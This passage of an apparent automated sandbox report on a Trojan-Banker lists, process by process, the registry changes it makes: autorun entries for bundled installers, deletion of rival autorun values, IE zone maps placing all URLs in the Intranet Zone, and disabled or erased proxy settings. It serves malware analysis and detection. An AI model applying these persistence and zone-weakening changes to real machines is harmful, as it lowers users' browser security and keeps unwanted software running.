"UninstallString" = "%Program Files%\YYMusic3\2014050713\Unins.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÒôÀÖFM]
"DisplayIcon" = "%Program Files%\YYMusic3\2014050713\Unins.exe"

The Trojan-Banker deletes the following value(s) in system registry:
The Trojan-Banker disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YyfmPlay"

"BoxNews"

"YYMusic3_News"

"YYMusic3"

The process axult.exe:1744 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B1 FA 66 C7 27 79 BA 4A 1A B3 05 76 82 B1 EF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MBManager.exe:2480 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E E0 9B 97 DC 52 DD A7 8D 9B 24 9C 35 9B 3A F6"

The process %original file name%.exe:132 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E D3 41 05 FE 16 81 DF 7D 7A DF CC 1A 64 0B D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\WinRAR SFX]
"C%%Program Files%vsgrtaho" = "%Program Files%\vsgrtaho"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"vsgrtaho.exe" = "vsgrtaho"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process vsgrtaho.exe:1684 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"setup_2948-140896.exe" = "MusicFM安装程序"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"setup_open_341.exe" = "无极影音安装程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 4B AE 51 CB CE 89 47 E2 3D 99 F6 AD 48 E3 5B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"axult.exe" = "axult"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"axuls.exe" = "axuls"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process YYSpeed2.exe:2084 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D D6 AB A3 35 43 F6 1B A2 3E 7E 7D 14 7C F0 B6"

The process setup_qd304.exe:2396 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 FC BC 25 B9 90 4E 0F A2 22 AE D6 0D 70 38 E6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\gssoft\gswb]
"InstallPath" = "%Program Files%\gssoft\gswb\"
"InstallType" = "0"
"OldInstallPath" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process setup_qd304.exe:1972 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 4A B1 37 B3 34 F4 E2 93 F6 C0 56 AC 62 EB AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Mutual.exe:2224 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCR\GSWBSkinFile\DefaultIcon]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe"

[HKLM\SOFTWARE\gssoft\gswb]
"InstallPath" = "%Program Files%\gssoft\gswb\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"DisplayVersion" = "2.8.1.1120"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\gssoft\gswb\˵Ã÷.txt,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"DisplayName" = "光速输入法 2.8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"URLInfoAbout" = "http://www.guangsu.cn/"

[HKCR\GSWBSkinFile\shell\open\command]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe -install %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"DisplayIcon" = "%Program Files%\gssoft\gswb\2.8.1.1120\Config.exe"

[HKCR\GSWBSkinFile]
"(Default)" = "GSWBSkinFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"Publisher" = "光速输入法"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 4E CB 65 5E FD A1 24 0B 40 10 08 1B 39 57 10"

[HKCR\.gss]
"(Default)" = "GSWBSkinFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"UninstallString" = "%Program Files%\gssoft\gswb\2.8.1.1120\Uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan-Banker adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GSMutualRunOne" = "%Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe RestartRunOneProgram"

The process YYMusic2.exe:3844 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 DD F0 47 6E 19 18 7A BD 42 06 D2 5E 36 5C 79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan-Banker adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YYMusic3_2014050713" = "%Program Files%\YYMusic3\2014050713\YYMusic2.exe -mini"

"YYMusic3_News_2014050713" = "%Program Files%\YYMusic3\2014050713\YYSpeed2.exe -mini"

The Trojan-Banker modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup_open_341.:2660 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÎÞ¼«Ó°Òô]
"DisplayIcon" = "%Program Files%\wjplay2\20140507132818\Unins.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÎÞ¼«Ó°Òô]
"DisplayName" = "wjplay2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\wjplay2]
"RD" = "_20140507132818"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÎÞ¼«Ó°Òô]
"DisplayVersion" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÎÞ¼«Ó°Òô]
"UninstallString" = "%Program Files%\wjplay2\20140507132818\Unins.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 D7 A2 A4 74 5D 93 3E 10 5B A9 C8 A4 2C 61 BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ÎÞ¼«Ó°Òô]
"Publisher" = "wjplay2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan-Banker adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjplay2_News_20140507132818" = "%Program Files%\wjplay2\20140507132818\WJSpeed.exe -mini"

"wjplay2_20140507132818" = "%Program Files%\wjplay2\20140507132818\wjplay.exe -mini"

The Trojan-Banker deletes the following value(s) in system registry:
The Trojan-Banker disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WJNews"

"wjplay2"

"WujiPlayer"

"wjplay2_News"

The process axuls.exe:884 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 24 1F 37 D7 A4 04 BD F4 CB 7B 75 06 B1 11 BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

